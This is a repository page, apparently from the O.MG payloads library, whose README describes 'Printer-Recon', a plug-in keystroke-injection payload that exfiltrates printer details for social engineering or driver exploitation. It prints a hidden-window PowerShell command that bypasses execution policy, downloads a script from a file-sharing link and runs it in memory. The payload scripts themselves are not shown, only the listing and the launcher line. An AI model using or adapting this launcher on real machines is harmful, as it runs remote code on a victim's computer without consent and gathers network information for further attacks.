omg-payloads/payloads/library/exfiltration/Printer-Recon
kalanihelekunihi 4a0fdf22c3 Fixing misc execution or formatting errors
There are many payloads in the repo that do not run due to compiler errors (mostly typos, but a few commands that do not exist on O.MG devices).

Fixing those errors, along with implementing minor changes such as using STRINGLN in place of STRING and ENTER, or DEFAULT_DELAY in place of DELAY 200 on every other line for improved readability.

No content of these scripts has been altered, and I do not intend to run them to validate that they work as intended on their target operating systems.
2023-06-05 12:29:42 -04:00
..
PR.ps1 Add files via upload 2022-11-14 22:41:02 -05:00
README.md Add files via upload 2022-11-14 22:41:02 -05:00
payload.txt Fixing misc execution or formatting errors 2023-06-05 12:29:42 -04:00

README.md

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Printer-Recon

Description

This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network

Getting Started

Dependencies

  • DropBox or other file sharing service - Your Shared link for the intended file
  • Windows 10

(back to top)

Executing program

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl

(back to top)

Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

Acknowledgments

(back to top)